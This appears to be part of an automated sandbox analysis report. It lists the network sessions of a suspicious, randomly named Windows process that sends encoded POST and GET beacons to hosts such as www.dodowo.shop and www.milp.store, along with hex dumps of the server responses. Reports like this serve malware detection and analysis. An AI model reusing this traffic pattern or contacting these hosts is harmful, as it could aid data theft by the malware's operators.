                                                                                                                    Data Raw: 65 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5a 4b 93 db c6 11 3e 7b 7f c5 2c 54 d9 05 2c 00 04 c0 37 29 48 65 cb 72 2a 89 1d b9 f4 28 1f b4 8a 6a 08 0c 49 48 78 69 06 d8 47 28 56 f9 90 4a e5 e0 ca c5 a9 8a 0f f1 31 95 6b 0e 39 e4 e0 ca 0f 8a e5 ff 90 9e 01 49 80 e4 f0 b1 a4 a2 5a 81 c4 4c 77 7f 3d 3d dd 3d 3d 33 bc 77 ea 27 5e 76 93 12 34 ce a2 f0 fe c9 3d fe 81 42 1c 8f 5c e5 4d 62 fc e6 89 82 bc 10 33 e6 2a 71 62 bc 66 0a 0a 32 12 71 7a 57 19 67 59 ca 7a b5 1a f3 c6 24 c2 66 42 47 b5 af c9 e0 2b 3c 22 05 15 f3 92 94 70 89 04 fb f7 4f 3e ba 17 91 0c 23 6f 8c 29 23 99 ab 3c 7f f6 b9 d1 51 16 ed 31 8e 40 e4 65 40 ae d2 84 66 00 9a c4 19 89 81 ee 2a f0 b3 b1 eb 93 cb c0 23 86 78 d1 51 10 07 59 80 43 83 79 38 24 ae ad a3 08 5a a2 3c 9a 37 08 b1 59 90 85 e4 fe cf 7f fe fe fd 0f ff 7a ff 8f 6f 7e fa fb 8f e8 fd 3f ff f3 fe 87 3f a0 f7 7f fa 1e bd ff eb 1f df ff f0 2d 3a bb d3 71 6c bb 8f 7c 0f 7b 8e 63 d5 3b d6 bd 5a c1 78 52 d1 eb 9c 26 83 24 63 e7 0b ad ce 23 7c 6d 04 11 0c d5 48 29 e1 5a f7 42 4c [TRUNCATED]
                                                                                                                    Data Ascii: e99ZK>{,T,7)Her*(jIHxiG(VJ1k9IZLw====3w'^v4=B\Mb3*qbf2qzWgYz$fBG+<"pO>#o)#<Q1@e@f*#xQYCy8$Z<7Yzo~??-:ql|{c;ZxR&$c#|mH)ZBLG84n@BzS_,QIm8 h38Y-J{B:AQ~"Cys4oy'~rlBAaFh3b2q kQ]RQ6OwS(%|`f7DLhG0->8|G!XfR%DEUI'WA^OI!Mf9,P.j5f^8a)%5|Qe/jm\]!i<v9:L0i{S( fM/jW)>yD0`n(4_-mt?}|AH|r7F$&}qt5cmr)Jty*&};ay32#zDGiOk%sxj>#YBL&_`D5Q0Q3M1N\5>B0}BLtK
                                                                                                                    Jan 10, 2025 20:49:41.905993938 CET224INData Raw: 87 77 1c 5f 62 98 06 91 98 16 af 63 12 8c c6 99 06 0d 30 ea f0 19 4c a3 9a 01 b9 a5 f5 8b 01 70 2d 9f 43 a0 d7 9d 4f 28 c5 37 2a 31 47 a0 13 9f 43 d0 1d ef 23 da f4 81 50 d3 a9 ab 1e a1 53 2c 74 d2 3f 94 36 5a 9f 92 2c a7 31 ca 4c 02 4e 70 a3 2e
                                                                                                                    Data Ascii: w_bc0Lp-CO(7*1GC#PS,t?6Z,1LNp.Mfu]"{9Js=(e1r1Ew<E>$"w,ge#`L{pjNC\^WV!tU<^]T7+2B4Zn9B1
                                                                                                                    Jan 10, 2025 20:49:41.906017065 CET1236INData Raw: 91 fa 9c cc 69 2d ac 3f b0 07 8a a4 6b 30 eb d2 a6 33 09 76 39 eb c3 f9 ac f3 a0 a0 ae 92 c7 3e 19 06 31 f1 95 53 97 af 0f c9 10 7d 9d d0 37 84 fe 32 4c 06 38 7c ca eb 89 b3 33 46 c2 21 54 00 10 ef b1 27 25 79 c0 fd f9 f1 70 08 49 9a 90 f8 a1 70
                                                                                                                    Data Ascii: i-?k03v9>1S}72L8|3F!T'%ypIpTVQPbUdEK?k<>Xy>ZSMO\S0p`eI&liY;`BRAEt@&7/C$/K7SN"S}de&5O-=0ye"Kb8}
                                                                                                                    Jan 10, 2025 20:49:41.906028986 CET224INData Raw: 83 0c 4c ca a7 91 cf a4 94 26 c5 21 31 52 70 5e 4e d7 ee f8 b8 2d a7 bb 0c 2e 03 df a0 04 f2 c2 1d 6f e8 10 87 c8 e9 c2 1c a2 31 c9 d9 8c 01 bc 26 1e 15 3a b4 ba 9b 86 b5 c2 83 79 0d c9 59 bc c1 66 16 9e 1d c1 06 50 9b 09 ab 00 79 7b e0 7b 83 e6
                                                                                                                    Data Ascii: L&!1Rp^N-.o1&:yYfPy{{6agfuV}jCo*9)!'60"Cq]v,f#gvb{17r^-9sk/sG+g2X-{O.8TH
                                                                                                                    Jan 10, 2025 20:49:41.906042099 CET1236INData Raw: 56 5b ba dd 68 eb 8e d3 d6 6d 0d 59 bf e0 8d aa dd 6c ea 1d 1b 1a 1b 1a b2 2d eb 17 9b a1 57 c3 b0 c4 ae c6 da 66 7c d5 76 1c c0 b1 74 bb 63 2d e0 2d dd b1 3a ba 5d b7 76 a2 4b f2 06 d7 60 43 0e da 66 06 a7 e9 80 0e 4d dd 2a cd c0 1b 9b ba 6d cd
                                                                                                                    Data Ascii: V[hmYl-Wf|vtc--:]vK`CfM*moJYZC7Z7v}2N>Am$WFXhml7'sn;|r&h@Fp3gi>0XSX-AOph$n5
                                                                                                                    Jan 10, 2025 20:49:41.906054974 CET224INData Raw: 16 d6 b6 04 59 4e b6 35 f2 df 3b 33 7c 88 12 49 89 8a d3 7e b9 6e 90 85 cd c7 cc 68 34 9c 17 87 4c 4f 3d e3 d7 74 93 9d d6 99 d8 67 1a ac 66 e4 27 24 3f 51 c1 c7 f9 13 9f fe 09 16 52 56 b3 12 47 06 a9 55 d0 08 ec 0b c2 a8 af a2 b1 43 46 a7 96 d1
                                                                                                                    Data Ascii: YN5;3|I~nh4LO=tgf'$?QRVGUCFu{x_~Qujpazbyr7_Hc,5h=v]nkcuz*iiC=-2CmYqa`L)yN%w
                                                                                                                    Jan 10, 2025 20:49:41.906069994 CET1236INData Raw: 98 5e da a6 c7 fc f0 7b f2 3f 3c 32 5c 4c bd 73 7a 02 8d 9e 55 b9 02 1e 8f e5 e0 f6 a5 3a fe bf 97 0c 8f 40 a4 07 f3 94 b2 ca 8f 58 4e 7c 4a 9f 5b d3 7e 86 cf 30 b4 4a 6b f3 bc 2d 2f 54 a7 49 89 69 04 df 02 73 18 c9 d7 36 3b 85 9d 84 d1 e3 8c 36
                                                                                                                    Data Ascii: ^{?<2\LszU:@XN|J[~0Jk-/TIis6;6;>owd<9k}>qg~5oI=>|Lh'n)"9V&Q6y3%iPO #nzqRvt2L0gy5S(kVN=,zN,/9
                                                                                                                    Jan 10, 2025 20:49:41.906081915 CET1236INData Raw: eb e0 b3 43 30 b2 2b 59 65 e0 7c 64 f2 18 0c dd c1 a1 7a b0 01 4a 20 ed 80 7a fb 88 53 48 f7 73 da bc 24 96 ef 99 f5 e6 38 e7 13 1b 0e 81 21 fd 56 9c 8a 63 9e 9d c7 26 dd c2 58 f7 c7 a2 8e 3f 66 de 69 b1 ba 63 ae a4 02 97 dd 06 7a e9 d5 ce 9b a5
                                                                                                                    Data Ascii: C0+Ye|dzJ zSHs$8!Vc&X?ficz;ou+9aeB85\}UwgdBgo[w\+-\.uDEYQ,M-{f{e*'t]an@yX"z]ONvt#^/0'2*\U&DVN\=
                                                                                                                    Jan 10, 2025 20:49:41.906090975 CET87INData Raw: c6 2c 18 7b a5 7e f1 02 0e 02 ff 8a e7 58 67 99 ca 9e 5d 62 58 1d 9d 1a 46 f2 a6 4e 18 29 13 04 ef 95 fb a3 9e 59 b7 47 2d 8c 91 9d fd 6a fb cd 4f 43 e1 c0 a8 24 c1 dc 8d c1 f6 cc db 4d b4 0e 1a b1 56 08 76 03 aa d1 09 02 b2 9e f2 34 f2 9f 00 00
                                                                                                                    Data Ascii: ,{~Xg]bXFN)YG-jOC$MVv4
                                                                                                                    Jan 10, 2025 20:49:41.912827015 CET1236INData Raw: 62 34 64 0d 0a c4 5d 4f 6f 24 47 15 3f b3 9f a2 99 15 08 89 74 bb fe 76 75 05 db 91 08 a0 e4 b0 68 95 80 38 5a e3 b1 63 0f 3b f6 58 33 f6 38 d9 13 42 42 8a 14 0e 20 0e 48 20 0e 91 22 e5 82 50 38 22 3e d2 3a df 81 f7 fb 55 75 4f cf 78 66 d6 6c 1c
                                                                                                                    Data Ascii: b4d]Oo$G?tvuh8Zc;X38BB H "P8">:UuOxflEz_]x9Gx9az'+teG",JDEzbEqydxq#Uxn6x[TE'toQXSN/&crHtC"I_4
                                                                                                                    Jan 10, 2025 20:49:41.912883997 CET1236INData Raw: d5 67 9f 7e fd d9 57 3d f2 f6 6e 26 87 4b 07 be bf 27 b6 9c 3c ff d3 35 8f 93 bc fd d6 d0 b0 c1 7f b1 c7 1b 78 e8 07 78 cb 9c 60 a5 9b 2f eb 61 be 8d 18 cb 1b 38 c2 a0 ad ed bd 6c 29 3f 0f b5 a1 25 d7 f0 7e 1e 9d 5b 8e 01 6d 3d 1d 28 fc fe e9 49
                                                                                                                    Data Ascii: g~W=n&K'<5xx`/a8l)?%~[m=(IOtBxE.!d\.S6r2p_5-n3;=@,B6#[:q'B_sKc,y(KYOTe^


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    11 | 192.168.2.6 | 49998 | 112.175.247.179 | 80 | 2196 | C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Jan 10, 2025 20:49:43.289314032 CET | 1870 | OUT | POST /44mq/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.dodowo.shop
                                                                                                                    Origin: http://www.dodowo.shop
                                                                                                                    Referer: http://www.dodowo.shop/44mq/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 1247
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 53 71 61 6b 5a 51 38 39 48 2f 56 57 72 5a 6b 6d 4e 37 33 58 41 58 4b 36 51 68 7a 44 69 65 44 58 43 49 72 69 37 49 67 6e 46 71 44 4c 46 55 52 50 6f 6a 6f 35 31 45 73 31 4b 6b 6a 62 64 69 79 31 73 4c 38 69 66 62 39 4f 41 5a 51 6e 6b 6b 6f 54 43 65 37 31 4c 34 35 58 78 4a 37 6b 65 48 4d 6c 57 37 35 55 34 57 6c 38 62 6c 51 34 50 34 77 37 6d 36 38 6b 73 33 55 70 55 42 50 4d 54 53 78 33 49 49 6a 58 65 49 65 77 4d 6d 39 77 2b 39 4a 2f 47 56 77 76 78 52 2b 48 49 6c 73 6c 72 4b 6a 52 58 57 79 39 63 6e 4f 70 43 2b 53 6d 46 78 79 75 4a 50 6f 6e 67 61 63 54 68 5a 37 6f 76 4a 79 36 6a 33 43 6e 6c 4c 45 64 53 59 75 33 73 4e 67 33 73 55 38 35 4f 4e 5a 68 73 41 39 70 74 4d 5a 6e 4a 39 7a 48 49 41 6a 72 66 42 54 5a 51 5a 45 36 63 68 32 4c 6d 38 64 64 2b 64 58 36 78 62 64 6c 59 42 48 57 4e 77 73 69 57 54 6a 4e 5a 6a 6d 4f 46 39 52 6d 69 30 46 39 73 4b 30 2b 31 63 44 59 43 33 35 6a 73 33 46 72 6a 4c 58 2f 64 73 4b 70 4a 50 39 39 6b 34 37 4c 6b 4e 55 47 52 56 36 54 35 53 2b 62 6d 37 6d 62 79 62 73 [TRUNCATED]
                                                                                                                    Data Ascii: nzs0T2=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 [TRUNCATED]
                                                                                                                    Jan 10, 2025 20:49:44.683546066 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: openresty
                                                                                                                    Date: Fri, 10 Jan 2025 19:49:44 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    Link: <http://dodowo.shop/wp-json/>; rel="https://api.w.org/"
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 65 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5a 4b 93 db c6 11 3e 7b 7f c5 2c 54 d9 05 2c 00 04 c0 37 29 48 65 cb 72 2a 89 1d b9 f4 28 1f b4 8a 6a 08 0c 49 48 78 69 06 d8 47 28 56 f9 90 4a e5 e0 ca c5 a9 8a 0f f1 31 95 6b 0e 39 e4 e0 ca 0f 8a e5 ff 90 9e 01 49 80 e4 f0 b1 a4 a2 5a 81 c4 4c 77 7f 3d 3d dd 3d 3d 33 bc 77 ea 27 5e 76 93 12 34 ce a2 f0 fe c9 3d fe 81 42 1c 8f 5c e5 4d 62 fc e6 89 82 bc 10 33 e6 2a 71 62 bc 66 0a 0a 32 12 71 7a 57 19 67 59 ca 7a b5 1a f3 c6 24 c2 66 42 47 b5 af c9 e0 2b 3c 22 05 15 f3 92 94 70 89 04 fb f7 4f 3e ba 17 91 0c 23 6f 8c 29 23 99 ab 3c 7f f6 b9 d1 51 16 ed 31 8e 40 e4 65 40 ae d2 84 66 00 9a c4 19 89 81 ee 2a f0 b3 b1 eb 93 cb c0 23 86 78 d1 51 10 07 59 80 43 83 79 38 24 ae ad a3 08 5a a2 3c 9a 37 08 b1 59 90 85 e4 fe cf 7f fe fe fd 0f ff 7a ff 8f 6f 7e fa fb 8f e8 fd 3f ff f3 fe 87 3f a0 f7 7f fa 1e bd ff eb 1f df ff f0 2d 3a bb d3 71 6c bb 8f 7c 0f 7b 8e 63 d5 3b d6 bd 5a c1 78 52 d1 eb 9c 26 83 24 63 e7 0b ad ce 23 7c 6d 04 11 0c d5 48 29 e1 5a f7 42 4c [TRUNCATED]
                                                                                                                    Data Ascii: e99ZK>{,T,7)Her*(jIHxiG(VJ1k9IZLw====3w'^v4=B\Mb3*qbf2qzWgYz$fBG+<"pO>#o)#<Q1@e@f*#xQYCy8$Z<7Yzo~??-:ql|{c;ZxR&$c#|mH)ZBLG84n@BzS_,QIm8 h38Y-J{B:AQ~"Cys4oy'~rlBAaFh3b2q kQ]RQ6OwS(%|`f7DLhG0->8|G!XfR%DEUI'WA^OI!Mf9,P.j5f^8a)%5|Qe/jm\]!i<v9:L0i{S( fM/jW)>yD0`n(4_-mt?}|AH|r7F$&}qt5cmr)Jty*&};ay32#zDGiOk%sxj>#YBL&_`D5Q0Q3M1N\5>B0}BLtK
                                                                                                                    Jan 10, 2025 20:49:44.683592081 CET1236INData Raw: 87 77 1c 5f 62 98 06 91 98 16 af 63 12 8c c6 99 06 0d 30 ea f0 19 4c a3 9a 01 b9 a5 f5 8b 01 70 2d 9f 43 a0 d7 9d 4f 28 c5 37 2a 31 47 a0 13 9f 43 d0 1d ef 23 da f4 81 50 d3 a9 ab 1e a1 53 2c 74 d2 3f 94 36 5a 9f 92 2c a7 31 ca 4c 02 4e 70 a3 2e
                                                                                                                    Data Ascii: w_bc0Lp-CO(7*1GC#PS,t?6Z,1LNp.Mfu]"{9Js=(e1r1Ew<E>$"w,ge#`L{pjNC\^WV!tU<^]T7+2B4Zn9B1i-?k03
                                                                                                                    Jan 10, 2025 20:49:44.683614016 CET448INData Raw: 77 86 c3 61 bf 34 a4 31 6b ad 3b f5 76 dd eb 17 2e 61 50 ec 07 39 eb 75 e1 5f 7a dd af 38 03 b7 7a 9f a7 68 c3 27 b0 63 15 fb ff a2 71 6e 7c 98 43 4f 35 5b 2d 3e c5 77 11 d4 51 1a 12 4d b6 59 af d7 17 6d 7d 5e 6b 15 c7 24 b6 69 3b 4d 12 4d 4b ad
                                                                                                                    Data Ascii: wa41k;v.aP9u_z8zh'cqn|CO5[->wQMYm}^k$i;MMK^*tT|de 2U]Zv$LI{4Ia,6Y!{cJFVzDV"9;[V.PfVcr@ll(:w`V_L&!1Rp^N
                                                                                                                    Jan 10, 2025 20:49:44.683629036 CET1236INData Raw: 56 5b ba dd 68 eb 8e d3 d6 6d 0d 59 bf e0 8d aa dd 6c ea 1d 1b 1a 1b 1a b2 2d eb 17 9b a1 57 c3 b0 c4 ae c6 da 66 7c d5 76 1c c0 b1 74 bb 63 2d e0 2d dd b1 3a ba 5d b7 76 a2 4b f2 06 d7 60 43 0e da 66 06 a7 e9 80 0e 4d dd 2a cd c0 1b 9b ba 6d cd
                                                                                                                    Data Ascii: V[hmYl-Wf|vtc--:]vK`CfM*moJYZC7Z7v}2N>Am$WFXhml7'sn;|r&h@Fp3gi>0XSX-AOph$n5
                                                                                                                    Jan 10, 2025 20:49:44.683641911 CET1236INData Raw: 16 d6 b6 04 59 4e b6 35 f2 df 3b 33 7c 88 12 49 89 8a d3 7e b9 6e 90 85 cd c7 cc 68 34 9c 17 87 4c 4f 3d e3 d7 74 93 9d d6 99 d8 67 1a ac 66 e4 27 24 3f 51 c1 c7 f9 13 9f fe 09 16 52 56 b3 12 47 06 a9 55 d0 08 ec 0b c2 a8 af a2 b1 43 46 a7 96 d1
                                                                                                                    Data Ascii: YN5;3|I~nh4LO=tgf'$?QRVGUCFu{x_~Qujpazbyr7_Hc,5h=v]nkcuz*iiC=-2CmYqa`L)yN%w^{?<2\Lsz
                                                                                                                    Jan 10, 2025 20:49:44.683655024 CET1236INData Raw: 4f 8c 0d da 83 83 ee 68 23 31 72 b2 b9 57 c0 32 f7 0a d0 26 31 17 80 8d 7d 1c ac b1 cf 04 94 af 12 13 4c d1 65 00 29 ba 4c 10 c5 12 33 81 94 7d 06 98 b2 4f b2 d5 7d 55 4a 5e 8f 98 22 5e c0 88 29 cd 0b 37 2d 68 46 c4 75 70 2d 3c 6a 6b 81 94 7c b4
                                                                                                                    Data Ascii: Oh#1rW2&1}Le)L3}O}UJ^"^)7-hFup-<jk|+S}b'A@Y=RN]Nuz]L?<pABLX[[a|p[K.UoC,H$xM)7e;U(w&C0+Ye|dz
                                                                                                                    Jan 10, 2025 20:49:44.683667898 CET311INData Raw: 2a 35 3b c1 d3 18 fa 60 af d3 a6 44 c4 0d aa 59 f0 08 a8 f1 44 12 0b b7 c6 01 82 a0 98 35 71 61 ea 75 cc 15 8e b6 37 60 b9 c5 8c 44 e5 83 9a 03 6a d7 50 c4 a3 1f b5 43 e1 a0 86 43 8d ab a6 ba ff 43 15 a2 22 d5 7d 87 13 cb 7d fb 1e 72 13 98 fb 26
                                                                                                                    Data Ascii: *5;`DYD5qau7`DjPCCC"}}r&'o6Yi+/il_{e(eS1Nn~R3%\3%39%fe,#aC4FL<.;$<xdHV:Fmvx}l3,{~Xg]
                                                                                                                    Jan 10, 2025 20:49:44.685189962 CET1236INData Raw: 62 34 64 0d 0a c4 5d 4f 6f 24 47 15 3f b3 9f a2 99 15 08 89 74 bb fe 76 75 05 db 91 08 a0 e4 b0 68 95 80 38 5a e3 b1 63 0f 3b f6 58 33 f6 38 d9 13 42 42 8a 14 0e 20 0e 48 20 0e 91 22 e5 82 50 38 22 3e d2 3a df 81 f7 fb 55 75 4f cf 78 66 d6 6c 1c
                                                                                                                    Data Ascii: b4d]Oo$G?tvuh8Zc;X38BB H "P8">:UuOxflEz_]x9Gx9az'+teG",JDEzbEqydxq#Uxn6x[TE'toQXSN/&crHtC"I_4
                                                                                                                    Jan 10, 2025 20:49:44.685220957 CET1236INData Raw: d5 67 9f 7e fd d9 57 3d f2 f6 6e 26 87 4b 07 be bf 27 b6 9c 3c ff d3 35 8f 93 bc fd d6 d0 b0 c1 7f b1 c7 1b 78 e8 07 78 cb 9c 60 a5 9b 2f eb 61 be 8d 18 cb 1b 38 c2 a0 ad ed bd 6c 29 3f 0f b5 a1 25 d7 f0 7e 1e 9d 5b 8e 01 6d 3d 1d 28 fc fe e9 49
                                                                                                                    Data Ascii: g~W=n&K'<5xx`/a8l)?%~[m=(IOtBxE.!d\.S6r2p_5-n3;=@,B6#[:q'B_sKc,y(KYOTe^
                                                                                                                    Jan 10, 2025 20:49:44.685233116 CET428INData Raw: 1c aa c6 27 73 01 a5 92 25 93 eb be 7e c3 68 fc fe e5 fc 7a 78 36 1b 5e 7c eb f1 78 dc 8d f4 58 11 b9 c3 f8 9d c7 e4 8e 8b f7 a3 b2 58 d2 37 c8 31 b5 92 94 31 f7 46 af 22 61 e8 81 cc 4d ce c3 bb 9a 54 3e 97 ae b9 63 ea 54 26 04 04 49 63 d0 8d c3
                                                                                                                    Data Ascii: 's%~hzx6^|xXX711F"aMT>cT&IcvQRkz%[48"SySOZI.9/i1P.2Hl=QWG/&%}CNbe~&2'*0r$@g
                                                                                                                    Jan 10, 2025 20:49:44.700551987 CET1236INData Raw: 35 39 61 0d 0a ec 1d cb 6e db 38 f0 9c bf 60 5d a0 37 69 2d 4b 7e 64 9b b6 68 0b 14 e8 21 28 16 db 7b a0 c4 72 64 44 6b 39 91 dc 6e f7 54 a0 a7 fe ce 7e d6 62 3f 62 39 33 24 35 a4 28 59 36 d2 6e 11 14 01 2c 8a 1c 0d df 33 c3 79 30 2d cb 43 97 92
                                                                                                                    Data Ascii: 59an8`]7i-K~dh!({rdDk9nT~b?b93$5(Y6n,3y0-CVt['jS+s1o[D"chj=*zMtUn_V[Pjc?GP03;m^3)^kitUrVE-t}M[cxtc#x1i-#K


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    12 | 192.168.2.6 | 49999 | 112.175.247.179 | 80 | 2196 | C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Jan 10, 2025 20:49:45.829828024 CET | 582 | OUT | GET /44mq/?nzs0T2=foyEanxfLfFujag6PZWyCDygORHT/b7ZEbPS/LApOdHxGUo+oiUz5nR/Y3bTUTystoAVEPBhAuIJq0FzLvmkL65YpPHBdFMnQ+RN4nJ4f0YiJMRNqIhlsXwKcwXCFylpIZyPQ/A=&mLFl=BXYPt2lXBpi8Dj HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.dodowo.shop
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Jan 10, 2025 20:49:46.967080116 CET | 487 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                    Server: openresty
                                                                                                                    Date: Fri, 10 Jan 2025 19:49:46 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    X-Redirect-By: WordPress
                                                                                                                    Location: http://dodowo.shop/44mq/?nzs0T2=foyEanxfLfFujag6PZWyCDygORHT/b7ZEbPS/LApOdHxGUo+oiUz5nR/Y3bTUTystoAVEPBhAuIJq0FzLvmkL65YpPHBdFMnQ+RN4nJ4f0YiJMRNqIhlsXwKcwXCFylpIZyPQ/A=&mLFl=BXYPt2lXBpi8Dj


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    13 | 192.168.2.6 | 50000 | 194.9.94.86 | 80 | 2196 | C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Jan 10, 2025 20:49:52.100171089 CET | 830 | OUT | POST /oqbp/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
Host: www.milp.store
Origin: http://www.milp.store
Referer: http://www.milp.store/oqbp/
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 211
User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
Data Ascii: nzs0T2=qX1D3EB7wwBM91NRT6biJS3U6yccpnFkp/vLPQebD0ddswaCMu/rEGzRlIWqQV76ApbyWj/MY9IUaZvDceEgT7Hna/AHcahvEq+YM5D6epujyPiuarseMI30OfgIkelP2AFKS2vSSPTMcgQ76jxHYTRRYuE1BYCHkgZy4SIqpSMNjDGpUvffX+03RE/0ntHSVYV4/kzPwDYN
Jan 10, 2025 20:49:52.737390041 CET | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 19:49:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/8.1.30
Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Jan 10, 2025 20:49:52.737443924 CET | 1236 | IN | Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Jan 10, 2025 20:49:52.737481117 CET | 448 | IN | Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Jan 10, 2025 20:49:52.737517118 CET | 1236 | IN | Data Ascii: ss="divider"></div><h2>Register domains at Loopia</h2><p>Protect your company name, brands and ideas as domains at one of the largest domain providers in Scandinavia. <a href="https://www.loopia.com/domainnames/?utm_medium=sitelink
Jan 10, 2025 20:49:52.737552881 CET | 1236 | IN | Data Ascii: d more at loopia.com/loopiadns </a></p> <div class="divider"></div><h2>Create a website at Loopia - quickly and easily</h2><p>Our full-featured web hosting packages include everything you need to get started with you
Jan 10, 2025 20:49:52.737588882 CET | 430 | IN | Data Ascii: ww.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb"><img src="https://static.loopia.se/shared/logo/logo-loopia-white.svg" alt="Loopia AB" id="logo" /></a><br /><p><a href="https://www.loopia.com/support?


Session ID: 14
Source IP: 192.168.2.6
Source Port: 50001
Destination IP: 194.9.94.86
Destination Port: 80
PID: 2196
Process: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 20:49:54.648653030 CET | 854 | OUT | POST /oqbp/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.milp.store
Origin: http://www.milp.store
Referer: http://www.milp.store/oqbp/
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 235
User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
Data Ascii: nzs0T2=qX1D3EB7wwBM/WFRRZjiPy3VmCcc7nFop/jLPV7AACtdsVmCLv/rJmzRuoWjd17tApXEWiDMY9cUaYfDcO4jSrHpPPABYahvEq+YM5Wteqejy/SubJUdPI31JfgIyulD2AEfS0L0SNbMchg77xVGLzRXVOFAII2KmDIx6itL0g8vi1bzIcf8FuU1RGnGnNH4XYt4tz/o/39uGQsCzcngjxSjU1Bk4+LjJw==
